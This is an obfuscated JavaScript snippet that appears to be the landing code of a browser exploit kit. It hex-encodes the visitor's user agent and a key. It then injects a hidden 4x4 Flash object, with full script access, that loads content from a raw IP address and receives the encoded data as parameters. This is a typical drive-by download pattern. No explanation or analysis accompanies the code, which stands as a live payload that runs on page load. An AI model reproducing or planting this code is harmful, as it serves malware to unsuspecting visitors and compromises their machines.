/*s9381d44590hssfj5911fs*/function hgfgerdfgdf(num, width){/*s77147d5979hfj31964fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s16274d12194hfj2827fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s96874d7234hfj22450fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s50871d87867hfj56586fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd54440hfs*/c += b + d;/*s76917d14065hfj96006fs*/e += 1;}return c;}/*s68734dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.104.202/?OTgxMjI2Mzk=&rand=xXzQMvWdbRXQCJ3EKvrcT6NHMVHRHECL2Y-dmrHTefjaelWkzrLFTF_xozKASASG6_JtdfJSDQ&elsa=fnj0GCegdkmt9cBlwa9vytiUPSn0Kd08GB_x2EYwhF-ZSUQbRq2g_8nLAkcs0lxhOF61ETi-tL&info=OTIxMTk0NQ==&travel=Mzg0MDMyODM=", ghnvbn("http://92.53.104.202/?NjQ5MjU3ODI=&info=NTAyNzE1OTE=&rand=xX_QMvWdbRXQC53EKvrcT6NHMVHRHECL2YydmrHTefjaelWkzrHFTF_yozKASwSG6_FtdfJSDQ&elsa=fnjEGCegRkmt9cBlwa9fytiUPSn0Ke08GB_x2EYwtF-ZSUQbRq2g_8nLMkeMIlwBKA6FENjOge&travel=MzUwMTc3MTM=","wexykukusw"));